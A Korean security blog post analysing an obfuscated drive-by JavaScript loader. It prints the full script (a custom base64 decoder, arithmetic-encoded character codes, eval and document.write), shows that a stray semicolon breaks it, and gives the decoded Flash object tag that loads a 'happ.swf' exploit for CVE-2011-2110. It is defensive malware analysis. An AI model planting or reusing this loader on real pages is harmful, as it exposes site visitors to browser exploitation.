난독화 코드 그리고 제작자의 실수?

최근 난독화 코드 중 새롭게 작성된 코드를 확인하여 공유 합니다. 우선 코드는 아래와 같습니다.
[code]<script>
var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
function mydata(input){
        var output="";
        var chr1,chr2,chr3="";
        var enc1,enc2,enc3,enc4="";
        var i=0;
        var base64test=/[^A-Za-z0-9+\/\=]/g;
        input=input.replace(/[^A-Za-z0-9+\/\=]/g,"");
        do{
                enc1=keyStrs.indexOf(input.charAt(i++));
                enc2=keyStrs.indexOf(input.charAt(i++));
                enc3=keyStrs.indexOf(input.charAt(i++));
                enc4=keyStrs.indexOf(input.charAt(i++));
                chr1=(enc1<<2)|(enc2>>4);
                chr2=((enc2&15)<<4)|(enc3>>2);
                chr3=((enc3&3)<<6)|enc4;
                output=output+String.fromCharCode(chr1);
                if(enc3!=64){output=output+String.fromCharCode(chr2);};
                if(enc4!=64){output=output+String.fromCharCode(chr3);};
                chr1=chr2=chr3="";
                enc1=enc2=enc3=enc4="";
        };
        while(i<input.length);return output;
        };
UU="2000 / 25 ,3905 / 55 ,60 – 3 ,106 – 1 ,189 – 92 ,206 – 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 – 51 ,114 – 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 – 51 ,96 + 3 ,85 – 35 ,137 – 29 ,4494 / 42 ,138 – 58 ,154 – 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 – 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 – 51 ,3003 / 39 ,193 – 87 ,8500 / 85 ,209 – 103 ,48 + 42 ,4686 / 66 ,109 – 36 ,59 – 9 ,165 – 75 ,41 + 42 ,11 + 38 ,0 + 104 ,6 + 84 ,2688 / 32 ,71 + 19 ,4601 / 43 ,76 / 1 ,124 – 40 ,2001 / 29 ,70 + 50 ,2047 / 23 ,56 – 6 ,3738 / 42 ,215 – 99 ,137 – 58 ,5 + 79 ,13 + 77 ,10290 / 98 ,5135 / 65 ,96 – 29 ,56 – 8 ,1728 / 36 ,80 – 2 ,69 – 1 ,29 + 52 ,33 + 16 ,4602 / 59 ,31 + 53 ,133 – 56 ,23 + 26 ,13 + 65 ,4 + 64 ,1625 / 25 ,6545 / 55 ,91 – 14 ,1020 / 15 ,110 – 45 ,5355 / 51 ,876 / 12 ,55 + 10 ,2112 / 44 ,24 + 51 ,10 + 90 ,94 – 44 ,24 + 84 ,99 + 8 ,17 + 83 ,92 – 21 ,193 – 90 ,1254 / 22 ,119 – 46 ,66 + 40 ,114 – 41 ,476 / 4 ,2002 / 26 ,101 – 34 ,121 – 48 ,194 – 91 ,50 + 47 ,852 / 12 ,97 – 11 ,209 – 97 ,1980 / 22 ,58 – 8 ,198 – 94 ,40 + 8 ,69 + 11 ,12 + 71 ,2044 / 28 ,5640 / 47 ,385 / 5 ,4352 / 64 ,260 / 4 ,2940 / 28 ,33 + 40 ,14 + 57 ,37 + 71 ,41 + 66 ,5280 / 66 ,6889 / 83 ,1554 / 21 ,60 – 12 ,28 + 62 ,96 – 8 ,154 – 76 ,11 + 37 ,99 – 26 ,8295 / 79 ,33 + 33 ,204 – 100 ,141 – 43 ,3550 / 50 ,153 – 45 ,218 – 108 ,104 – 6 ,10812 / 102 ,41 + 7 ,184 – 79 ,2842 / 29 ,6612 / 76 ,142 – 34 ,75 + 32 ,61 + 29 ,77 – 6 ,840 / 7 ,200 – 92 ,15 + 58 ,45 + 61 ,97 – 45 ,44 + 34 ,2345 / 35 ,79 + 27 ,49 + 71 ,6545 / 55 ,6586 / 74 ,101 – 13 ,145 – 71 ,21 + 83 ,146 – 48 ,581 / 7 ,6 + 60 ,468 / 4 ,3649 / 41 ,10 + 77 ,57 – 8 ,132 – 24 ,4480 / 56 ,56 + 27 ,108 – 34 ,2204 / 19 ,108 – 10 ,73 – 22 ,157 – 67 ,148 – 36 ,98 – 8 ,18 + 65 ,1679 / 23 ,7004 / 68 ,4000 / 40 ,100 + 9 ,11 + 59 ,139 – 24 ,24 + 76 ,16 + 71 ,111 – 26 ,1653 / 29 ,53 + 20 ,5341 / 49 ,118 – 14 ,2704 / 26 ,114 – 15 ,86 – 14 ,11 + 54 ,3042 / 26 ,137 – 38 ,90 – 39 ,159 – 59 ,8938 / 82 ,40 + 40 ,53 + 66 ,1248 / 26 ,90 – 15 ,9118 / 94 ,15 + 72 ,75 – 22 ,143 – 34 ,88 + 10 ,121 + 1 ,816 / 17 ,134 – 15 ,3080 / 40 ,10700 / 100 ,157 – 72 ,1100 / 22 ,96 – 19 ,1830 / 15 ,210 / 3 ,107 – 40 ,152 – 74 ,76 + 9 ,37 + 36 ,11 + 109 ,7 + 70 ,7442 / 61 ,97 – 12 ,5 + 117 ,39 + 38 ,11102 / 91 ,121 – 44 ,83 – 33 ,1053 / 13 ,4335 / 51 ,80 – 7 ,59 – 10 ,124 – 47 ,118 – 33 ,139 – 58 ,205 – 83 ,62 + 16 ,156 – 72 ,131 – 58 ,2550 / 50 ,137 – 56 ,6890 / 65 ,189 – 89 ,71 – 5 ,82 – 4 ,82 + 25 ,166 – 76 ,55 + 11 ,22 + 60 ,39 + 45 ,17 + 82 ,56 – 3 ,109 – 30 ,1632 / 24 ,152 – 63 ,150 – 45 ,70 + 3 ,110 – 43 ,952 / 17 ,1763 / 41 ,93 – 25 ,118 – 37 ,179 – 68 ,20 + 36 ,85 + 14 ,126 – 55 ,1820 / 26 ,14399 / 119 ,5696 / 64 ,165 – 78 ,17 + 31 ,186 – 83 ,64 + 34 ,46 + 63 ,59 + 11 ,3 + 113 ,26 + 64 ,25 + 59 ,50 – 2 ,35 + 70 ,150 – 51 ,76 + 12 ,1892 / 22 ,169 – 65 ,4214 / 43 ,43 + 28 ,197 – 89 ,84 – 36 ,166 – 65 ,150 – 67 ,4453 / 61 ,3090 / 30 ,80 + 20 ,10246 / 94 ,93 – 23 ,69 + 46 ,9500 / 95 ,25 + 62 ,140 – 55 ,67 – 10 ,134 – 61 ,94 + 15 ,24 + 80 ,10304 / 92 ,74 + 16 ,40 + 10 ,145 – 42 ,47 + 58 ,40 + 33 ,11 + 56 ,2912 / 52 ,69 – 26 ,3536 / 52 ,88 – 7 ,41 + 70 ,82 – 26 ,18 + 81 ,63 + 8 ,37 + 33 ,14399 / 119 ,41 + 48 ,143 – 56 ,1488 / 31 ,159 – 56 ,157 – 59 ,16 + 93 ,28 + 42 ,70 + 46 ,21 + 69 ,22 + 62 ,13 + 35 ,193 – 88 ,19 + 70 ,1526 / 14 ,185 – 85 ,199 – 93 ,72 + 26 ,33 + 17 ,9960 / 83 ,13452 / 114 ,121 – 22 ,8925 / 85 ,1460 / 20 ,118 – 15 ,168 – 68 ,4796 / 44 ,65 + 5 ,224 – 109 ,1600 / 16 ,94 – 7 ,99 – 14 ,1311 / 23 ,40 + 33 ,3360 / 32 ,123 – 45 ,156 – 47 ,630 / 7 ,173 – 64 ,129 – 39 ,4142 / 38 ,145 – 55 ,5995 / 55 ,2 + 87 ,52 + 53 ,110 – 37 ,57 + 10 ,1624 / 29 ,39 + 4 ,1088 / 16 ,72 + 9 ,7992 / 72 ,23 + 33 ,7425 / 75 ,75 – 4 ,133 – 63 ,88 + 33 ,76 + 13 ,1218 / 14 ,58 – 10 ,77 + 26 ,2254 / 23 ,67 + 42 ,4480 / 64 ,33 + 83 ,167 – 77 ,6636 / 79 ,31 + 17 ,82 + 23 ,166 – 67 ,90 – 19 ,42 + 78 ,97 + 7 ,3030 / 30 ,158 – 75 ,8 + 65 ,125 – 22 ,153 – 53 ,15 + 94 ,66 + 4 ,50 + 65 ,3900 / 39 ,51 + 36 ,85 / 1 ,11 + 46 ,4745 / 65 ,137 – 27 ,33 + 49 ,160 – 39 ,5400 / 54 ,120 – 33 ,55 + 30 ,49 + 56 ,949 / 13 ,47 + 20 ,110 – 54 ,258 / 6 ,44 + 24 ,76 + 5 ,92 + 19 ,112 / 2 ,190 – 91 ,112 – 41 ,29 + 41 ,5566 / 46 ,99 – 10 ,4002 / 46 ,32 + 16 ,137 – 34 ,55 + 43 ,31 + 78 ,36 + 34 ,9744 / 84 ,3150 / 35 ,1344 / 16 ,17 + 31 ,167 – 62 ,50 + 48 ,74 – 3 ,61 – 4 ,98 + 20 ,115 – 16 ,2814 / 42 ,18 + 55 ,10506 / 102 ,157 – 57 ,6867 / 63 ,108 – 38 ,217 – 102 ,700 / 7 ,128 – 41 ,2125 / 25 ,71 – 14 ,1241 / 17 ,201 – 91 ,138 – 56 ,6413 / 53 ,6900 / 69 ,116 – 29 ,0 + 85 ,169 – 64 ,72 + 1 ,108 – 41 ,29 + 27 ,22 + 21 ,30 + 38 ,1620 / 20 ,12210 / 110 ,22 + 34 ,173 – 74 ,36 + 35 ,40 + 30 ,3751 / 31 ,176 – 87 ,40 + 47 ,2064 / 43 ,157 – 54 ,3136 / 32 ,158 – 49 ,3010 / 43 ,4640 / 40 ,167 – 77 ,83 + 1 ,144 / 3 ,99 + 6 ,400 / 4 ,39 + 11 ,26 + 23 ,52 + 66 ,87 + 3 ,101 – 30 ,1700 / 20 ,9030 / 86 ,69 + 4 ,97 – 25 ,73 + 17 ,8944 / 86 ,124 – 26 ,4536 / 63 ,124 – 38 ,1296 / 12 ,42 + 38 ,161 – 78 ,4218 / 57 ,31 + 20 ,5432 / 56 ,5481 / 63 ,2014 / 38 ,69 + 38 ,7644 / 78 ,1122 / 22 ,3663 / 37 ,106 – 1 ,67 + 6 ,4288 / 64 ,10 + 46 ,86 – 43 ,93 – 25 ,1377 / 17 ,156 – 45 ,4 + 52 ,3762 / 38 ,16 + 55 ,82 – 12 ,225 – 104 ,6497 / 73 ,169 – 82 ,74 – 26 ,8755 / 85 ,17 + 81 ,1308 / 12 ,12 + 58 ,220 – 104 ,180 – 90 ,111 – 27 ,14 + 34 ,145 – 40 ,185 – 86 ,58 – 8 ,99 – 21 ,207 – 103 ,127 – 29 ,1349 / 19 ,6290 / 74 ,148 – 43 ,4599 / 63 ,49 + 23 ,4860 / 54 ,195 – 91 ,68 + 30 ,144 – 72 ,3096 / 36 ,101 + 7 ,121 – 41 ,108 – 25 ,1258 / 17 ,227 – 105 ,76 + 21 ,95 – 24 ,69 – 12 ,1989 / 39 ,111 – 22 ,152 – 65 ,3960 / 33 ,65 + 50 ,14 + 59 ,45 + 60 ,116 – 51 ,61 + 57 ,148 – 68 ,721 / 7 ,52 – 4 ,3375 / 45 ,83 – 3 ,1872 / 26 ,110 – 44 ,135 – 31 ,1881 / 19 ,191 – 82 ,25 + 45 ,121 – 5 ,29 + 44 ,25 + 46 ,40 + 13 ,173 – 69 ,187 – 89 ,1044 / 12 ,4590 / 54 ,855 / 15 ,25 + 48 ,11 + 98 ,85 – 36 ,131 – 23 ,2156 / 22 ,4620 / 42 ,1020 / 12 ,73 + 32 ,73 / 1 ,576 / 8 ,96 – 6 ,3432 / 33 ,4704 / 48 ,4 + 68 ,101 – 15 ,194 – 86 ,5120 / 64 ,913 / 11 ,9 + 65 ,27 + 21 ,129 – 30 ,11440 / 104 ,68 + 18 ,126 – 18 ,86 – 13 ,154 – 49 ,68 – 3 ,2950 / 25 ,62 + 18 ,171 – 68 ,32 + 16 ,59 + 16 ,90 – 10 ,118 – 46 ,2904 / 44 ,112 – 8 ,8415 / 85 ,152 – 43 ,88 – 18 ,83 + 33 ,13 + 60 ,3408 / 48 ,1431 / 27 ,4264 / 41 ,294 / 3 ,97 – 10 ,44 + 41 ,84 – 27 ,26 + 47 ,174 – 65 ,95 – 13 ,79 + 29 ,168 – 68 ,101 + 8 ,2376 / 22 ,68 + 38 ,98 – 8 ,164 – 77 ,9 + 81 ,156 – 38 ,2940 / 30 ,80 + 30 ,4941 / 61 ,4200 / 40 ,11 + 62 ,3600 / 50 ,5130 / 57 ,10816 / 104 ,158 – 60 ,89 – 17 ,3096 / 36 ,18 + 90 ,32 + 48 ,664 / 8 ,2 + 72 ,63 + 46 ,165 – 76 ,435 / 5 ,68 + 52 ,2 + 120 ,126 – 36 ,1826 / 22 ,119 – 46 ,137 – 34 ,101 – 25 ,117 + 5 ,364 / 7 ,1482 / 19 ,2546 / 38 ,130 – 24 ,30 + 90 ,22 + 97 ,60 + 29 ,1408 / 16 ,1628 / 22 ,106 – 2 ,8036 / 82 ,143 – 60 ,31 + 35 ,197 – 80 ,4717 / 53 ,4437 / 51 ,1421 / 29 ,5292 / 49 ,92 – 12 ,4648 / 56 ,1702 / 23 ,63 + 59 ,58 + 31 ,54 + 33 ,22 + 98 ,75 + 37 ,30 + 60 ,55 – 5 ,57 – 5 ,525 / 5 ,2628 / 36 ,42 + 30 ,131 – 41 ,2288 / 22 ,46 + 52 ,2520 / 35 ,2666 / 31 ,5508 / 51 ,4000 / 50 ,2241 / 27 ,55 + 18 ,98 + 7 ,3723 / 51 ,74 – 7 ,2968 / 53 ,63 – 20 ,15 + 53 ,3321 / 41 ,190 – 79 ,2576 / 46 ,156 – 57 ,77 – 6 ,1260 / 18 ,46 + 75 ,3115 / 35 ,2262 / 26 ,19 + 29 ,48 + 55 ,149 – 51 ,103 + 6 ,17 + 53 ,13 + 103 ,58 + 32 ,22 + 62 ,52 – 4 ,73 + 32 ,14 + 75 ,37 + 50 ,231 – 111 ,226 – 111 ,111 – 13 ,99 – 48 ,6200 / 62 ,0 + 84 ,96 – 7 ,81 – 30 ,3034 / 41 ,72 + 40 ,8316 / 84 ,142 – 70 ,4264 / 52 ,103 – 37 ,31 + 58 ,78 – 28 ,53 + 25 ,13 + 95 ,23 + 76 ,459 / 9 ,56 + 21 ,159 – 54 ,58 + 15 ,85 – 13 ,4590 / 51 ,35 + 69 ,37 + 61 ,49 + 23 ,163 – 77 ,8424 / 78 ,79 + 1 ,92 – 9 ,133 – 59 ,11590 / 95 ,19 + 70 ,7134 / 82 ,54 – 5 ,64 + 44 ,128 – 46 ,67 + 4 ,64 – 7 ,7076 / 61 ,2670 / 30 ,7482 / 86 ,186 – 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 – 68 ,1632 / 34 ,88 – 13 ,131 – 51 ,91 – 24 ,3078 / 54 ,6726 / 57 ,153 – 64 ,57 + 52 ,94 + 18 ,126 – 18 ,96 – 7 ,96 – 45 ,405 / 5 ,65 – 22 ";
t=eval("mydata(String.fromCharCode("+UU+"))");
document.write(t);
</script>
[/code]

눈으로 보기엔 아주 난독화가 심하게 되어 있는거 같지만 해당 코드는 그냥 간단하게 맨 아래 있는 document.write(t); 부분의 ‘t’ 값만 확인하면 난독화 하기 전 코드를 확인할 수 있습니다.

그런데 그렇게 시도하면 난독화가 풀리지가 않습니다. 코드를 확인해본 결과 아래 부분에서 오류가 나는걸 확인할 수 있었는대요
[code]do{
                enc1=keyStrs.indexOf(input.charAt(i++));
                enc2=keyStrs.indexOf(input.charAt(i++));
                enc3=keyStrs.indexOf(input.charAt(i++));
                enc4=keyStrs.indexOf(input.charAt(i++));
                chr1=(enc1<<2)|(enc2>>4);
                chr2=((enc2&15)<<4)|(enc3>>2);
                chr3=((enc3&3)<<6)|enc4;
                output=output+String.fromCharCode(chr1);
                if(enc3!=64){output=output+String.fromCharCode(chr2);};
                if(enc4!=64){output=output+String.fromCharCode(chr3);};
                chr1=chr2=chr3="";
                enc1=enc2=enc3=enc4="";
        };
        while(i<input.length);return output;
[/code]

위 코드에서 14번째 라인인 "};" 부분에서 오류가 남을 확인할 수 있습니다. 일반적으로 do while 문을 작성할 떄 do{} while(조건식); 형태로 작성하여야 하는데 해당 코드를 보면 do {}; while(조건식); 으로 작성되어 있음을 알 수 있습니다.

따라서 세미콜론 제거 후 풀면 아래와 같은 코드를 확인할 수 있습니다.
[code]<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"

width="200" height="100" id="test" align="middle">

<param name="movie" value="happ.swf?

info=02E631B5B1353336AB51D3527B7A6FAE7986" />

<param name="quality" value="high" />

<param name="bgcolor" value="#ffffff" />

<param name="play" value="true" />

<param name="loop" value="true" />

<param name="wmode" value="window" />

<param name="scale" value="showall" />

<param name="menu" value="true" />

<param name="devicefont" value="false" />

<param name="salign" value="" />

<param name="allowScriptAccess" value="sameDomain" />

</object>
[/code]

위 코드는 Adobe Flash Player 취약점인 CVE-2011-2110 으로 확인되었습니다.

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다